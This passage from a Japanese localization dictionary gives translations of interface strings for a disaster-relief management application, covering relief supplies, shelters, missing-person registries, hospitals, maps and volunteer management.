'List Contacts': '連絡先一覧',
'List Credentials': '証明書一覧',
'List Current': '現在の一覧',
'List Distribution Items': '配給物資リスト',
'List Distributions': '配給所リスト',
'List Documents': '文書の一覧',
'List Donors': '資金提供組織一覧',
'List Feature Layers': 'Featureレイヤリスト',
'List Flood Reports': '洪水レポート一覧',
'List GPX Layers': 'GPXレイヤ一覧',
'List Groups': 'グループ一覧',
'List Groups/View Members': 'グループを一覧/メンバーを表示',
'List Hospitals': '病院の一覧',
'List Identities': 'ID一覧',
'List Images': '画像の一覧',
'List Impact Assessments': '災害影響範囲アセスメント一覧',
'List Impact Types': '災害影響のタイプ一覧',
'List Impacts': '被害一覧',
'List Incident Reports': 'インシデントレポート一覧',
'List Incidents': 'インシデント一覧',
'List Inventory Items': '備蓄物資リスト',
'List Inventory Stores': '物資集積地点リスト',
'List Item Catalog Categories': '救援物資カタログのカテゴリ一覧',
'List Item Catalogs': '救援物資カタログ一覧',
'List Item Categories': '物資カテゴリ一覧',
'List Item Packs': '物資パックの一覧',
'List Item Sub-Categories': '物資サブカテゴリ一覧',
'List Items': '救援物資一覧',
'List Keys': 'Keyの一覧',
'List Kits': 'Kit一覧',
'List Layers': 'レイヤ一覧',
'List Level 1 Assessments': 'レベル1アセスメントの一覧',
'List Level 1 assessments': 'レベル1アセスメント一覧',
'List Level 2 Assessments': 'レベル2のアセスメント一覧',
'List Level 2 assessments': 'レベル2アセスメント一覧',
'List Locations': 'ロケーション一覧',
'List Log Entries': 'ログエントリ一覧',
'List Map Profiles': '地図設定の一覧',
'List Markers': 'マーカー一覧',
'List Members': 'メンバ一覧',
'List Memberships': 'メンバシップ一覧',
'List Messages': 'メッセージ一覧',
'List Metadata': 'メタデータ一覧',
'List Missing Persons': '行方不明者リストを表示',
'List Need Types': '需要タイプ一覧',
'List Needs': 'ニーズ一覧',
'List Notes': '追加情報一覧',
'List Offices': 'オフィス一覧',
'List Organizations': '団体一覧',
'List Peers': 'データ同期先一覧',
'List Personal Effects': '携帯品のリスト',
'List Persons': '人物情報一覧',
'List Photos': '写真リスト',
'List Positions': '場所一覧',
'List Problems': '問題一覧',
'List Projections': '地図投影法リスト',
'List Projects': 'プロジェクト一覧',
'List Rapid Assessments': '被災地の現況アセスメント一覧',
'List Received Items': '受領された物資の一覧',
'List Received Shipments': '受領された輸送一覧',
'List Records': 'レコード一覧',
'List Registrations': '登録証明書の一覧',
'List Reports': 'レポート一覧',
'List Request Items': '物資要請リスト',
'List Requests': '支援要請の一覧',
'List Resources': 'リソース一覧',
'List Responses': '回答の一覧',
'List Rivers': '河川リスト',
'List Roles': '役割一覧',
'List Sections': 'Section一覧',
'List Sectors': '活動分野の一覧',
'List Sent Items': '送付した物資一覧',
'List Sent Shipments': '送付済み物資一覧',
'List Service Profiles': 'サービスプロファイル一覧',
'List Settings': '設定一覧',
'List Shelter Services': '避難所での提供サービス一覧',
'List Shelter Types': '避難所タイプ一覧',
'List Shelters': '避難所の一覧',
'List Shipment Transit Logs': '物資輸送履歴の一覧',
'List Shipment/Way Bills': '輸送費/渡航費の一覧',
'List Shipment<>Item Relation': '輸送と物資の関連性一覧',
'List Shipments': '配送の一覧',
'List Sites': 'Site一覧',
'List Skill Types': 'スキルタイプを一覧表示',
'List Skills': 'スキルを一覧表示',
'List Solutions': '解決案一覧',
'List Staff Types': 'スタッフタイプ一覧',
'List Staff': 'スタッフ一覧',
'List Status': '状況一覧',
'List Storage Bin Type(s)': 'Storage Binタイプ一覧',
'List Storage Bins': 'Storage Bin一覧',
'List Storage Location': '備蓄地点の一覧',
'List Subscriptions': '寄付申し込み一覧',
'List Support Requests': '支援要求のリスト',
'List Survey Answers': '調査の回答の一覧',
'List Survey Questions': 'Survey Question一覧',
'List Survey Sections': 'Survey Sectionsの一覧',
'List Survey Series': '一連の調査リスト',
'List Survey Templates': '調査テンプレートの一覧',
'List TMS Layers': 'TMS レイヤの一覧',
'List Tasks': 'タスク一覧',
'List Teams': 'チーム一覧',
'List Themes': 'テーマ一覧',
'List Tickets': 'チケット一覧',
'List Tracks': '追跡情報の一覧',
'List Units': '単位一覧',
'List Users': 'ユーザ一覧',
'List Volunteers': 'ボランティアの表示',
'List WMS Layers': 'WMSレイヤ一覧',
'List Warehouse Items': '倉庫に備蓄中の物資一覧',
'List Warehouses': '倉庫の一覧',
'List all': '全項目を表示',
'List of Items': '物資一覧',
'List of Missing Persons': '行方不明者リスト',
'List of Peers': 'データ同期先一覧',
'List of Reports': 'レポート一覧',
'List of Requests': '支援要請の一覧',
'List of Roles': '権限リスト',
'List of Spreadsheets uploaded': 'アップロード済スプレッドシート一覧',
'List of Spreadsheets': 'スプレッドシート一覧',
'List of Volunteers for this skill set': 'このスキルを所持するボランティアの一覧',
'List of addresses': '住所一覧',
'List unidentified': '身元不明者の一覧',
'List': '一覧',
'List/Add': '一覧/追加',
'Lists "who is doing what & where". Allows relief agencies to coordinate their activities': '救援団体は自身の支援活動の内容と場所を登録し、公開することで、他の組織との活動を調整することが可能となります。',
'Live Help': 'ライブヘルプ',
'Livelihood': '生計',
'Load Cleaned Data into Database': '整形したデータをデータベースへロード',
'Load Details': '詳細情報の読み込み',
'Load Raw File into Grid': 'Rawファイルをグリッドにロードしてください',
'Load the details to help decide which is the best one to keep out of the 2.': '2つのうちどちらを残すほうがよいか判断するため、詳細情報を確認します。',
'Loading Locations': 'ロケーションデータロード中',
'Loading Locations...': '位置を読込みしています ...',
'Loading': '読み込み中',
'Local Name': 'ローカル名',
'Local Names': 'ローカル名',
'Location 1': 'ロケーション 1',
'Location 2': 'ロケーション 2',
'Location De-duplicated': 'ロケーションの重複解消',
'Location Details': 'ロケーションの詳細',
'Location Hierarchy Level 0 Name': 'ロケーション階層レベル0の名前',
'Location Hierarchy Level 1 Name': 'ロケーション階層レベル1の名前',
'Location Hierarchy Level 2 Name': 'ロケーション階層レベル2の名前',
'Location Hierarchy Level 3 Name': 'ロケーション階層レベル3の名前',
'Location Hierarchy Level 4 Name': 'ロケーション階層レベル4の名前',
'Location Hierarchy Level 5 Name': 'ロケーション階層レベル5の名前',
'Location added': 'ロケーションを追加しました',
'Location cannot be converted into a group.': 'ロケーションはグループに変換できません',
'Location deleted': 'ロケーションを削除しました',
'Location details': 'ロケーションの詳細',
'Location group cannot be a parent.': 'ロケーショングループは親にできません',
'Location group cannot have a parent.': 'ロケーショングループに親情報がありません。',
'Location updated': 'ロケーションを更新しました',
'Location': 'ロケーション',
'Location: ': 'ロケーション: ',
'Locations De-duplicator': 'ロケーションの重複解消',
'Locations of this level need to have a parent of level': 'このレベルのロケーションには、親属性となるレベルが必要です',
'Locations should be different!': '異なる位置を設定してください!',
'Locations': 'ロケーション',
'Lockdown': '厳重監禁',
'Log Entry Details': 'ログエントリの詳細',
'Log entry added': 'ログエントリを追加しました',
'Log entry deleted': 'ログエントリを削除しました',
'Log entry updated': 'ログエントリを更新しました',
'Log': 'ログ',
'Logged in': 'ログインしました',
'Logged out': 'ログアウトしました',
'Login': 'ログイン',
'Logistics Management System': '物流管理システム',
'Logistics Management': '物流管理',
'Logistics': '物流',
'Logo file %s missing!': 'ロゴファイル%sが見つかりません。',
'Logo': 'ロゴ',
'Logout': 'ログアウト',
'Long Text': '詳細テキスト',
'Longitude is West - East (sideways). Latitude is North-South (Up-Down). Latitude is zero on the equator and positive in the northern hemisphere and negative in the southern hemisphere. Longitude is zero on the prime meridian (Greenwich Mean Time) and is positive to the east, across Europe and Asia. Longitude is negative to the west, across the Atlantic and the Americas. These need to be added in Decimal Degrees.': '経度は東西方向(横)の座標軸です。緯度は南北方向(上下)の座標軸です。赤道ではゼロ、北半球ではプラス、南半球ではマイナスとなります。経度は、子午線(グリニッジ標準時)をゼロとして、東(ヨーロッパ、アジア)がプラスとなります。西(大西洋、アメリカ)がマイナスです。10進法で記入してください。',
'Longitude is West - East (sideways). Longitude is zero on the prime meridian (Greenwich Mean Time) and is positive to the east, across Europe and Asia. Longitude is negative to the west, across the Atlantic and the Americas.': '経度は東西(横)です。経度は子午線(グリニッジ標準時)でゼロ、東(ヨーロッパ、アジア)でプラスです。西(大西洋、アメリカ)でマイナスです。',
'Longitude is West - East (sideways).': '緯度は東西です(横方向)',
'Longitude is zero on the prime meridian (Greenwich Mean Time) and is positive to the east, across Europe and Asia. Longitude is negative to the west, across the Atlantic and the Americas.': '経度はグリニッジ子午線(グリニッジ標準時)上が0度です。東側に向かってヨーロッパやアジアの各地で正の値となります。西に向かって大西洋やアメリカの各地で負の値となります。',
'Longitude should be between': '経度の値の有効な範囲は',
'Longitude': '経度',
'Looking up Parents': '親を検索',
'Looting': '略奪',
'Lost Password': 'パスワードの紛失',
'Lost': '行方不明',
'Low': '低',
'Magnetic Storm': '磁気嵐',
'Main cash source': '主な現金収入源',
'Main income sources before disaster': '災害発生前の主な収入源',
'Major expenses': '主な費用',
'Major outward damage': '大きな損傷あり',
'Make Commitment': 'コミットの作成',
'Make Pledge': '寄付の作成',
'Make Request': '支援を要請する',
'Make a Request for Aid': '援助要請を登録',
'Make a Request': '支援要請を登録',
'Make preparations per the <instruction>': '<instruction>毎に準備作業を行う',
'Male': '男性',
'Malnutrition present prior to disaster': '災害前から栄養が失調発生していた',
'Manage Category': 'カテゴリ管理',
'Manage Item catalog': '物資カタログの管理',
'Manage Kits': 'Kitsの管理',
'Manage Relief Item Catalogue': '救援アイテムカタログの管理',
'Manage Sub-Category': 'サブカテゴリの管理',
'Manage Users & Roles': 'ユーザと役割の管理',
'Manage Warehouses/Sites': '倉庫/Sitesの管理',
'Manage requests for supplies, assets, staff or other resources. Matches against Inventories where supplies are requested.': '支援物資、資産、人員、その他のリソースに対する要求を管理します。支援物資が要求された時に在庫と照合します。',
'Manage requests of hospitals for assistance.': '病院からの支援要請の管理',
'Manage volunteers by capturing their skills, availability and allocation': 'ボランティアのスキル、稼働状況、割り当て状況を管理します',
'Manage': '管理',
'Manager': 'マネージャ',
'Managing Office': 'オフィスの管理',
'Managing, Storing and Distributing Relief Items': '救援物資の保管、流通、配布状況を管理します',
'Managing, Storing and Distributing Relief Items.': '救援物資の管理、保存、配布状況を管理します。',
'Mandatory. In GeoServer, this is the Layer Name. Within the WFS getCapabilities, this is the FeatureType Name part after the colon(:).': '必須項目。GeoServerでのこの項目はレイヤー名となります。WFSの get Capabilitiesでは、コロン( : )の後に付与される FeatureTypeとして表示されます。',
'Mandatory. The URL to access the service.': '省略できません。サービスにアクセスするためのURLです。',
'Manual Synchronization': 'データ手動同期',
'Manual': 'マニュアル',
'Many': '多数',
'Map Profile added': '地図の設定を追加しました',
'Map Profile deleted': '地図設定を削除しました',
'Map Profile updated': '地図設定を更新しました',
'Map Profile': '地図の設定',
'Map Profiles': '地図の設定',
'Map Height': '地図の縦高',
'Map Service Catalog': '地図サービスカタログ',
'Map Settings': '地図の設定',
'Map Viewing Client': '地図閲覧クライアント',
'Map Width': '地図の横幅',
'Map of Hospitals': '病院の地図',
'Map': '地図',
'Mapping': 'マッピング',
'Marine Security': '海上保安',
'Marital Status': '婚姻状況',
'Marker Details': 'マーカーの詳細',
'Marker added': 'マーカーを追加しました',
'Marker deleted': 'マーカーを削除しました',
'Marker updated': 'マーカーを更新しました',
'Marker': 'マーカー',
'Markers': 'マーカー',
'Master Message Log to process incoming reports & requests': '受け取ったレポートと要求を処理するマスターメッセージログ',
'Master Message Log': 'マスターメッセージログ',
'Match Percentage': '一致率',
'Match Requests': '支援要請マッチ',
'Match percentage indicates the % match between these two records': 'マッチの割合は、2つのレコードの間のマッチ状況をあわらします',
'Matching Catalog Items': '適合する救援物資カタログ',
'Matching Records': '一致するレコード',
'Matrix of Choices (Multiple Answers)': '選択肢 (複数可)',
'Matrix of Choices (Only one answer)': '選択肢 (複数選択不可)',
'Matrix of Text Fields': 'テキストフィールドのマトリックス',
'Max Persons per Dwelling': '住居ごとの最大収容人数',
'Maximum Weight': '最大重量',
'Maximum weight capacity of the Storage Location followed by choosing the unit from the drop down list.': '最大重量| ドロップダウンリストで単位を選択してから、備蓄地点の最大重量を指定します。',
'Maximum weight capacity of the items the storage bin can contain. followed by choosing the unit from the drop down list.': 'storage binに収容することができるアイテムの最大重量を指定します。ドロップダウンリストから、単位を選択してください。',
'Measure Area: Click the points around the polygon & end with a double-click': '観測領域: 多角形の角をクリックし、ダブルクリックで終了',
'Measure Length: Click the points along the path & end with a double-click': '距離を計測: 経路上の中継点をクリックして、終点でダブルクリックしてください',
'Medical and public health': '医療、公衆衛生',
'Medicine': '薬品',
'Medium': '中',
'Megabytes per Month': '1月毎のメガバイト数',
'Member removed from Group': 'メンバシップを削除しました',
'Members': 'メンバ',
'Membership Details': 'メンバシップの詳細',
'Membership updated': 'メンバシップを更新しました',
'Membership': 'メンバシップ',
'Memberships': 'メンバシップ',
'Message Details': 'メッセージの詳細',
'Message Sent': 'メッセージが送信されました',
'Message Variable': 'メッセージ変数',
'Message added': 'メッセージを追加しました',
'Message deleted': 'メッセージを削除しました',
'Message field is required!': 'メッセージは必須です',
'Message sent to outbox': 'メッセージを送信箱に送りました',
'Message updated': 'メッセージを更新しました',
'Message variable': 'メッセージ変数',
'Message': 'メッセージ',
'Messages': 'メッセージ',
'Messaging settings updated': 'メッセージング設定を更新しました',
'Messaging': 'メッセージング',
'Metadata Details': 'メタデータの詳細',
'Metadata added': 'メタデータを追加しました',
'Metadata can be supplied here to be applied to all uploaded photos, if desired.': '必要に応じて、アップロードした全ての画像に適用されるメタデータをここで入力できます。',
'Metadata deleted': 'メタデータを削除しました',
'Metadata updated': 'メタデータを更新しました',
'Metadata': 'メタデータ',
'Meteorite': '隕石落下',
'Meteorological (inc. flood)': '気象 (洪水を含む)',
'Method used': '使用されるメソッド',
'Micronutrient malnutrition prior to disaster': '災害前から栄養失調傾向あり',
'Middle Name': 'ミドルネーム',
'Migrants or ethnic minorities': '移民、あるいは少数民族の数',
'Military': '軍隊',
'Minimum Bounding Box': '最小:領域を指定した枠組み',
'Minimum shift time is 6 hours': '最小シフト時間は6時間です。',
'Minor/None': '少数 / なし',
'Minorities participating in coping activities': '少数民族が災害対応に従事',
'Minute': '分',
'Minutes must be a number between 0 and 60': '分には0-60の間の数字を記入してください',
'Minutes must be a number greater than 0 and less than 60': '分数は0から60の間で入力してください',
'Minutes per Month': '一ヶ月に数分間',
'Minutes should be a number greater than 0 and less than 60': '分は0から60の間で入力してください',
'Miscellaneous': 'その他',
'Missing Person Details': '行方不明者の詳細',
'Missing Person Reports': '行方不明者レポート',
'Missing Person': '行方不明者',
'Missing Persons Registry': '行方不明者の登録',
'Missing Persons Report': '行方不明者のレポート',
'Missing Persons': '行方不明者',
'Missing Report': '行方不明レポート',
'Missing Senior Citizen': '高齢者の行方不明',
'Missing Vulnerable Person': '被介護者の行方不明',
'Missing': '行方不明',
'Mobile Assess.': '移動端末アクセス',
'Mobile Basic Assessment': 'モバイルの基本アセスメント',
'Mobile Basic': 'モバイルの基礎',
'Mobile Phone': '携帯番号',
'Mobile': 'モバイル',
'Mode': 'モード',
'Modem Settings': 'モバイル機器の設定',
'Modem settings updated': 'モバイル機器の設定を更新しました',
'Moderate': 'モデレート',
'Moderator': 'モデレータ',
'Modify Feature: Select the feature you wish to deform & then Drag one of the dots to deform the feature in your chosen manner': '地物の変更: 変形する地物を選択し、点の一つをドラッグすることで地物の形を修正可能です。',
'Modify Information on groups and individuals': 'グループと個人の情報更新',
'Modifying data in spreadsheet before importing it to the database': 'データベース登録前に、スプレッドシート内のデータ項目を修正',
'Module Administration': 'モジュール管理',
'Module disabled!': 'モジュールが無効です',
'Module provides access to information on current Flood Levels.': 'このモジュールにより、洪水の現在の水位情報にアクセス可能です',
'Module stores structured reports done by Professional Organizations - currently data includes WFP Assessments.': 'モジュールでは、専門団体によって作成された調査文書を管理します。データには、WFP(国連世界食糧計画)アセスメントも含まれます。',
'Monday': '月曜日',
'Monthly Cost': '月額費用',
'Monthly Salary': '給与(月額)',
'Months': '月',
'Morgue Status': '死体安置所のステータス',
'Morgue Units Available': '死体公示所の収容可能数',
'Mosque': 'モスク',
'Motorcycle': 'オートバイ',
'Moustache': '口ひげ',
'Move Feature: Drag feature to desired location': 'Featureの移動: Feature を希望するロケーションにドラッグしてください',
'Movements (Filter In/Out/Lost)': '活動 (フィルター イン/アウト/ロスト)',
'MultiPolygon': 'マルチポリゴン',
'Multiple Choice (Multiple Answers)': '複数選択(複数回答)',
'Multiple Choice (Only One Answer)': '複数選択(1つだけ回答)',
'Multiple Matches': '複数の結果が適合しました',
'Multiple Text Fields': '複数の入力項目',
'Multiple': '複数',
'Multiplicator': '乗数',
'Muslim': 'イスラム教徒',
'Must a location have a parent location?': 'ある場所にはその親の場所が無ければならないですか?',
'My Current function': '現在登録している機能',
'My Tasks': '自分のタスク',
'N/A': '該当なし',
'NZSEE Level 1': 'NZSEE レベル1',
'NZSEE Level 2': 'NZSEE レベル 2',
'Name and/or ID Label': '名前および/またはIDラベル',
'Name and/or ID': '名前および/またはID',
'Name of Storage Bin Type.': '物資保管タイプの名前です。',
'Name of the file (& optional sub-path) located in static which should be used for the background of the header.': 'ヘッダーの背景に使用される、static にあるファイルの名前 (オプションでサブパス)。',
'Name of the file (& optional sub-path) located in static which should be used for the top-left image.': '左上の画像で静的位置を表すファイル名(サブパス名はオプション)',
'Name of the file (& optional sub-path) located in views which should be used for footer.': 'フッターに使われるビューにあるファイル名 (オプションとしてサブパス)。',
'Name of the person in local language and script (optional).': '現地言語での名前と表記(オプション)',
'Name of the unit or department this report refers to. Leave empty if your hospital has no subdivisions.': 'このレポートに関連する組織や部署の名前。部署をもたない病院の場合は空欄にしてください。',
'Name or Job Title': '名前あるいは役職名',
'Name': '名前',
'Name, Org and/or ID': '名前、組織、IDなど',
'Name/Model/Type': '名前/ モデル/タイプ',
'Name: ': '名前: ',
'Names can be added in multiple languages': '名前は、複数の言語で記述することができます。',
'National ID Card': 'ナショナルIDカード',
'National NGO': '国内NPO',
'National Staff': '現地スタッフ',
'Nationality of the person.': 'この人物の国籍です。',
'Nationality': '国籍',
'Nautical Accident': '船舶事故',
'Nautical Hijacking': '船舶ハイジャック',
'Need Type Details': '需要タイプの詳細',
'Need Type added': '需要タイプを追加しました',
'Need Type deleted': '需要タイプを削除しました',
'Need Type updated': '需要タイプを更新しました',
'Need Type': '需要タイプ',
'Need Types': '需要タイプ',
'Need added': 'ニーズを追加しました',
'Need deleted': 'ニーズを削除しました',
'Need to be logged-in to be able to submit assessments': '評価を確定させるには、ログインが必要です',
'Need to configure Twitter Authentication': 'Twitterの認証を設定する必要があります',
'Need to select 2 Locations': 'ロケーションを2つ指定してください',
'Need to specify a Budget!': '予算を指定する必要があります。',
'Need to specify a Kit!': 'Kitを指定する必要があります。',
'Need to specify a Resource!': 'リソースを指定する必要があります。',
'Need to specify a bundle!': 'bundleを指定する必要があります。',
'Need to specify a group!': 'グループを指定する必要があります。',
'Need to specify a location to search for.': '検索対象となるロケーションを指定する必要があります。',
'Need to specify a role!': '役割を指定する必要があります。',
'Need to specify a service!': 'サービスを指定してください!',
'Need to specify a table!': 'テーブルを指定する必要があります。',
'Need to specify a user!': 'ユーザを指定する必要があります。',
'Need updated': 'ニーズを更新しました',
'Needs Details': '需要の詳細',
'Needs to reduce vulnerability to violence': '暴力行為の対策として必要な物資 / サービス',
'Needs': '要求',
'Negative Flow Isolation': '逆流の分離',
'Neighbourhood': '近隣',
'Neighbouring building hazard': '隣接ビルが危険な状態',
'Neonatal ICU': '新生児ICU',
'Neonatology': '新生児科',
'Network': 'ネットワーク',
'Neurology': '神経科',
'New Assessment reported from': '新規アセスメントの報告元',
'New Checklist': '新規チェックリスト',
'New Peer': '新しいデータ同期先',
'New Record': '新規レコード',
'New Report': '新規レポート',
'New Request': '新規の支援要請',
'New Solution Choice': '新しい解決案を選択',
'New Support Request': '新しい支援要請',
'New Synchronization Peer': '新しい同期先',
'New cases in the past 24h': '過去24時間の新規ケース数',
'New': '新規',
'News': 'ニュース',
'Next View': '次を表示',
'Next': '次へ',
'No Activities Found': '支援活動が見つかりませんでした',
'No Addresses currently registered': '住所は、まだ登録がありません。',
'No Aid Requests have been made yet': '援助要請がまだ作成されていません',
'No Alternative Items currently registered': '代替物資は現在登録されていません',
'No Assessment Summaries currently registered': 'アセスメントの要約が登録されていません',
'No Assessments currently registered': '登録済みのアセスメントがありません',
'No Asset Assignments currently registered': '現在のところ資産割り当ては登録されていません',
'No Assets currently registered': '登録されている資産は現在ありません。',
'No Baseline Types currently registered': '登録済みのBaseline Typesはありません',
'No Baselines currently registered': '登録されている基準値はありません',
'No Brands currently registered': '登録されている銘柄がありません',
'No Budgets currently registered': '予算は、まだ登録がありません。',
'No Bundles currently registered': 'Bundleは、まだ登録がありません。',
'No Catalog Items currently registered': '登録済みのカタログアイテムがありません',
'No Category<>Sub-Category<>Catalog Relation currently registered': 'Category<>Sub-Category<>Catalog間の関係は、まだ登録がありません。',
'No Checklist available': '利用可能なチェックリストがありません',
'No Cluster Subsectors currently registered': 'クラスタのサブセクタはまだ登録がありません',
'No Clusters currently registered': '登録済みのクラスタはありません',
'No Commitment Items currently registered': '現在のところコミット済み物資は登録されていません',
'No Commitments': 'コミットメントがありません',
'No Configs currently defined': '設定は、まだ定義されていません',
'No Credentials currently set': '現在のところ証明書が設定されていません',
'No Details currently registered': '詳細は、まだ登録されていません',
'No Distribution Items currently registered': '配給物資の登録がありません',
'No Distributions currently registered': '配給所の登録がありません',
'No Documents found': '文書が見つかりませんでした。',
'No Donors currently registered': '資金提供組織はまだ登録されていません',
'No Feature Layers currently defined': 'Feature Layersはまだ定義されていません',
'No Flood Reports currently registered': '登録済みの洪水情報はありません',
'No GPX Layers currently defined': 'GPXレイヤはまだ定義されていません',
'No Groups currently defined': 'グループはまだ定義されていません',
'No Groups currently registered': 'グループはまだ登録されていません',
'No Hospitals currently registered': '病院はまだ登録されていません',
'No Identification Report Available': '利用可能なIDレポートはありません',
'No Identities currently registered': '登録されているIDはありません',
'No Image': '画像なし',
'No Images currently registered': '画像の登録はありません',
'No Impact Types currently registered': '被害の種類は未登録です',
'No Impacts currently registered': 'これまでに登録されたImpactはありません',
'No Incident Reports currently registered': '登録されているインシデントレポートはありません',
'No Incidents currently registered': '登録済みのインシデントはありません。',
'No Incoming Shipments': '到着予定の輸送物資',
'No Inventory Items currently registered': '備蓄物資の登録がありません',
'No Inventory Stores currently registered': '現在登録されている物資集積地点はありません',
'No Item Catalog Category currently registered': '救援物資カタログのカテゴリはまだ登録がありません',
'No Item Catalog currently registered': 'アイテムカタログはまだ登録されていません',
'No Item Categories currently registered': '救援物資カテゴリの登録がありません',
'No Item Packs currently registered': '救援物資のパックは、まだ登録がありません',
'No Item Sub-Category currently registered': '救援物資のサブカテゴリはまだ登録されていません',
'No Item currently registered': 'アイテムはまだ登録されていません',
'No Items currently registered': '物資はまだ登録されていません',
'No Items currently requested': '要求されている物資はありません',
'No Keys currently defined': 'Keyはまだ定義されていません',
'No Kits currently registered': 'Kitはまだ登録されていません',
'No Level 1 Assessments currently registered': '現在のところ、レベル1アセスメントは登録されていません',
'No Level 2 Assessments currently registered': '現在のところ、レベル2アセスメントは登録されていません',
'No Locations currently available': '現在利用可能なロケーションはありません',
'No Locations currently registered': 'ロケーションはまだ登録されていません',
'No Map Profiles currently defined': '地図の設定が定義されていません',
'No Markers currently available': '現在利用可能なマーカーはありません',
'No Match': '合致する結果がありません',
'No Matching Catalog Items': '適合する救援物資はありませんでした',
'No Matching Records': '適合する検索結果がありませんでした',
'No Members currently registered': 'メンバはまだ登録されていません',
'No Memberships currently defined': 'メンバシップはまだ登録されていません',
'No Messages currently in Outbox': '送信箱にメッセージがありません',
'No Metadata currently defined': 'メタデータはまだ定義されていません',
'No Need Types currently registered': '現在登録されている需要タイプはありません',
'No Needs currently registered': '現在要求は登録されていません',
'No Offices currently registered': 'オフィスはまだ登録されていません',
'No Offices found!': 'オフィスが見つかりませんでした',
'No Organizations currently registered': '団体はまだ登録されていません',
'No Packs for Item': 'この物資に対する救援物資パックはありません',
'No Peers currently registered': '登録済みのデータ同期先はありません',
'No People currently registered in this shelter': 'この避難所に登録されている人物情報はありません',
'No Persons currently registered': '人物情報はまだ登録されていません',
'No Persons currently reported missing': '現在、行方不明者の登録はありません',
'No Persons found': '該当する人物はいませんでした',
'No Photos found': '写真の登録がありません',
'No Picture': '写真がありません',
'No Presence Log Entries currently registered': '所在地履歴の登録がありません',
'No Problems currently defined': '定義済みの問題がありません',
'No Projections currently defined': '地図投影法は、まだ定義されていません。',
'No Projects currently registered': '定義済みのプロジェクトはありません',
'No Rapid Assessments currently registered': '被災地の現況アセスメントはまだ登録されていません',
'No Received Items currently registered': '受領された救援物資の登録はありません',
'No Received Shipments': '受け取った輸送はありません',
'No Records currently available': '利用可能なレコードはありません',
'No Records matching the query': '条件に当てはまるレコードが存在しません',
'No Request Items currently registered': '物資要請の登録がありません',
'No Requests have been made yet': '支援要請は、まだ行われていません',
'No Requests match this criteria': 'この条件に一致する支援要請はありません',
'No Requests': '支援要請がありません',
'No Responses currently registered': '現在登録されていて返答が無いもの',
'No Rivers currently registered': '河川情報の登録がありません',
'No Roles currently defined': '役割はまだ定義されていません',
'No Sections currently registered': 'このセクションの登録情報がありません',
'No Sectors currently registered': '登録済みの活動分野がありません',
'No Sent Items currently registered': '送付した物資の登録がありません',
'No Sent Shipments': '送付が行われた輸送がありません',
'No Settings currently defined': '設定は、まだ定義されていません',
'No Shelter Services currently registered': '登録されている避難所サービスがありません',
'No Shelter Types currently registered': '登録済みの避難所タイプがありません',
'No Shelters currently registered': '避難所はまだ登録されていません',
'No Shipment Transit Logs currently registered': '物資輸送履歴の登録がありません',
'No Shipment/Way Bills currently registered': '輸送費/Way Billsはまだ登録されていません',
'No Shipment<>Item Relation currently registered': '輸送とアイテムの関連付けはまだ登録されていません',
'No Sites currently registered': '登録されているサイトはありません',
'No Skill Types currently set': '設定済みのスキルタイプはありません',
'No Solutions currently defined': '解決案はまだ定義されていません',
'No Staff Types currently registered': 'スタッフタイプはまだ登録されていません',
'No Staff currently registered': 'スタッフはまだ登録されていません',
'No Storage Bin Type currently registered': '登録済みのStorage Binタイプがありません',
'No Storage Bins currently registered': 'Storage Binはまだ登録されていません',
'No Storage Locations currently registered': '登録されている備蓄地点がありません',
'No Subscription available': '寄付の申し込みがありません',
'No Support Requests currently registered': '現在のところ、支援要請は登録されていません',
'No Survey Answers currently registered': 'これまでに登録されたフィードバックの回答はありません',
'No Survey Questions currently registered': '登録済みのSurvey Questionsはありません',
'No Survey Sections currently registered': '登録済みのSurvey Sectionはありません',
'No Survey Series currently registered': '現在、調査報告は登録されていません',
'No Survey Template currently registered': '登録されている調査テンプレートがありません',
'No TMS Layers currently defined': 'TMS レイヤーがまだ定義されていません',
'No Tasks with Location Data': 'ロケーション情報を持っているタスクがありません',
'No Themes currently defined': 'テーマはまだ定義されていません',
'No Tickets currently registered': 'チケットはまだ定義されていません',
'No Tracks currently available': '利用可能な追跡情報はありません',
'No Units currently registered': '単位はまだ登録されていません',
'No Users currently registered': '登録済みのユーザがありません',
'No Volunteers currently registered': 'ボランティアの登録がありません',
'No Warehouse Items currently registered': '現在登録済みの倉庫物資はありません',
'No Warehouses currently registered': '倉庫が登録されていません',
'No Warehouses match this criteria': '条件に合致する倉庫がありません',
'No access at all': '完全に孤立中',
'No access to this record!': 'このレコードにはアクセスできません',
'No action recommended': 'アクション無しを推奨',
'No calculations made': '見積が作成されていません',
'No conflicts logged': 'コンフリクトのログはありません。',
'No contact information available': '利用可能な連絡先情報はありません',
'No contacts currently registered': '連絡先が登録されていません',
'No data in this table - cannot create PDF!': 'テーブルにデータがありません。PDF を作成できません。',
'No databases in this application': 'このアプリケーションにデータベースはありません',
'No dead body reports available': '遺体情報のレポートはありません',
'No entries found': 'エントリが見つかりません',
'No entries matching the query': 'クエリに一致するエントリはありませんでした。',
'No import jobs': 'インポートされたJobがありません',
'No linked records': 'リンクされているレコードはありません',
'No location known for this person': 'この人物の消息が不明です',
'No locations found for members of this team': 'このチームのメンバーの場所が見つかりませんでした',
'No locations registered at this level': 'この階層に登録されているロケーションはありません',
'No log entries matching the query': '検索に合致するログエントリがありません',
'No matching items for this request': 'この支援要請に適合する物資はありません',
'No matching records found.': '一致するレコードがありませんでした。',
'No messages in the system': 'システム上にメッセージが存在しません',
'No notes available': '追加情報はありません',
'No peers currently registered': '現在登録されているデータ同期先はありません',
'No pending registrations found': '処理保留中の登録申請はありません',
'No pending registrations matching the query': '検索に合致する処理保留登録申請がありません。',
'No person record found for current user.': '現在のユーザの人物情報レコードが見つかりませんでした。',
'No positions currently registered': '登録されているpositionがありません',
'No problem group defined yet': '定義済みの問題グループがありません。',
'No records matching the query': '条件に当てはまるレコードが存在しません',
'No records to delete': '削除するレコードがありません',
'No recovery reports available': '利用可能な遺体回収レポートはありません',
'No report available.': '利用可能なレポートはありません。',
'No reports available.': '利用可能なレポートがありません。',
'No reports currently available': '利用可能なレポートはありません',
'No requests found': '支援要請は見つかりませんでした',
'No resources currently registered': 'リソースはまだ登録されていません',
'No resources currently reported': 'レポート済みのリソースはありません',
'No service profile available': '利用可能なサービスプロファイルはありません',
'No skills currently set': 'スキルが登録されていません',
'No status information available': '状況に関する情報はありません',
'No synchronization': '同期なし',
'No tasks currently registered': 'タスクはまだ登録されていません',
'No template found!': 'テンプレートが見つかりません。',
'No units currently registered': '単位はまだ登録されていません',
'No volunteer information registered': 'ボランティア情報はまだ登録されていません',
'No': 'いいえ',
'Non-structural Hazards': 'その他の災害',
'None (no such record)': 'なし(記録がありません)',
'None': 'なし',
'Noodles': '麺',
